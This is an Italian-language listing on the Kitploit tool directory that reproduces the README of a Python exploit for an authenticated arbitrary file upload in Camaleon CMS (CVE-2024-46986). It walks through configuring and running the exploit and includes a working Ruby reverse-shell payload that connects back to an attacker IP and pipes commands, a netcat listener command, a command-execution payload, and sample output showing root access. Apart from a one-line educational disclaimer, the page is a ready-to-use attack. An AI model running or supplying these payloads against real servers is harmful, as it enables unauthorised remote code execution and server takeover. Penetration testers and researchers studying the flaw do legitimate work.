Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-46986 — Exploit Python automatizzato per la vulnerabilità di upload arbitrario di file in Camaleon CMS (CVE-2024-46986). Supporta payload di reverse shell ed esecuzione di comandi per l'esecuzione remota di codice autenticata. | Kitploit
Strumenti/GitHubGitHub/vidura2/cve-2024-46986
ExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubvidura2/cve-2024-46986

CVE-2024-46986

Exploit Python automatizzato per la vulnerabilità di upload arbitrario di file in Camaleon CMS (CVE-2024-46986). Supporta payload di reverse shell ed esecuzione di comandi per l'esecuzione remota di codice autenticata.

Vedi Repository
391 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-46986

Camaleon CMS Exploit - Caricamento Arbitrario di File

Questo repository contiene uno script Python che automatizza lo sfruttamento di una vulnerabilità di upload file in Camaleon CMS. La vulnerabilità consente a un attaccante di caricare file arbitrari (come script Ruby) sul server, potenzialmente portando all'esecuzione remota di codice (RCE) o ad altri gravi impatti sulla sicurezza.

Caratteristiche

  • Exploit di Caricamento File: Carica script Ruby malevoli sul server target.
  • Opzioni Payload: Scegli tra un payload di reverse shell e un payload di esecuzione comandi.
  • Esecuzione Comandi Ripetuta: Per il payload di esecuzione comandi, lo script permette all'utente di inserire comandi ripetutamente.
  • Automazione: Automatizza l'intero processo usando la libreria requests di Python.

Prerequisiti

  • Credenziali Utente Valide: È necessaria una sessione autenticata affinché l'exploit funzioni. Servono auth_token e _cms_session di un utente valido.

  • Python 3.x: Assicurati di avere Python 3.x installato.

  • Libreria requests di Python: Installa la libreria requests se non già presente.

    root@kitploit:~
    pip install requests
    
  • Utilizzo

    1. Clona il repository:

      root@kitploit:~
      git clone https://github.com/vidura2/CVE-2024-46986.git
      cd CVE-2024-46986
      
    2. Modifica lo script:

      • Sostituisci i segnaposto your_auth_token_here, your_session_token_here e https://target_site_here nello script Python con valori reali.
      • Se usi il payload reverse shell, sostituisci anche your_ip e your_port con il tuo indirizzo IP e la porta su cui configurerai un listener.
    3. Scegli il tipo di payload:

      • Reverse Shell: Per caricare una reverse shell, imposta la variabile payload_type nello script su "reverse_shell".
      • Esecuzione Comandi: Per caricare uno script che esegue comandi di sistema, imposta payload_type su "command_execution". Potrai inserire ripetutamente comandi da eseguire sul server target.
    4. Esegui l'exploit:

      root@kitploit:~
      python exploit_camaleon.py
      

      Se usi il payload di esecuzione comandi, puoi inserire più comandi:

      root@kitploit:~
      Inserisci un comando di sistema da eseguire (o digita 'exit' per uscire): whoami
      Inserisci un comando di sistema da eseguire (o digita 'exit' per uscire): ls
      Inserisci un comando di sistema da eseguire (o digita 'exit' per uscire): exit
      

    Tipi di Payload

    1. Reverse Shell

    Il payload reverse shell si collega di ritorno alla macchina dell'attaccante, consentendo l'esecuzione remota di codice sul server.

    • Modifica l'IP e la porta nello script Ruby all'interno del codice Python.

    • Esempio di payload:

      root@kitploit:~
      require 'socket'
      s = TCPSocket.open('your_ip', your_port)
      while (cmd = s.gets)
        IO.popen(cmd, 'r') do |io|
          s.print io.read
        end
      end
      

    Configura un listener sulla tua macchina usando netcat:

    root@kitploit:~
    nc -lvnp <your_port>
    

    2. Esecuzione Comandi

    Questo payload carica uno script Ruby che esegue comandi di sistema (ad esempio whoami) sul server. Puoi inserire ripetutamente comandi durante l'esecuzione.

    • Lo script continuerà a chiedere comandi fino a quando non digiti exit.

    • Esempio:

      root@kitploit:~
      system("whoami")
      

    Esempio di Exploit Riuscito

    Una volta eseguito con successo l'exploit, dovresti vedere un output nel terminale che indica il successo:

    root@kitploit:~
    Exploit eseguito con successo con tipo di payload: reverse_shell!
    

    Se usi la reverse shell, il listener netcat dovrebbe darti accesso al terminale del server compromesso.

    Per il payload di esecuzione comandi:

    root@kitploit:~
    Inserisci un comando di sistema da eseguire (o digita 'exit' per uscire): whoami
    Comando 'whoami' eseguito con successo!
    Risposta: root
    

    Disclaimer

    Questo script è destinato esclusivamente a scopi educativi. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo exploit. Assicurati sempre di avere il permesso prima di testare o sfruttare vulnerabilità.

    Contributi

    Sentiti libero di inviare issue o pull request per miglioramenti o funzionalità aggiuntive!

    Licenza

    Questo progetto è concesso in licenza MIT - vedi il file LICENSE per i dettagli.

    Scarica lo strumento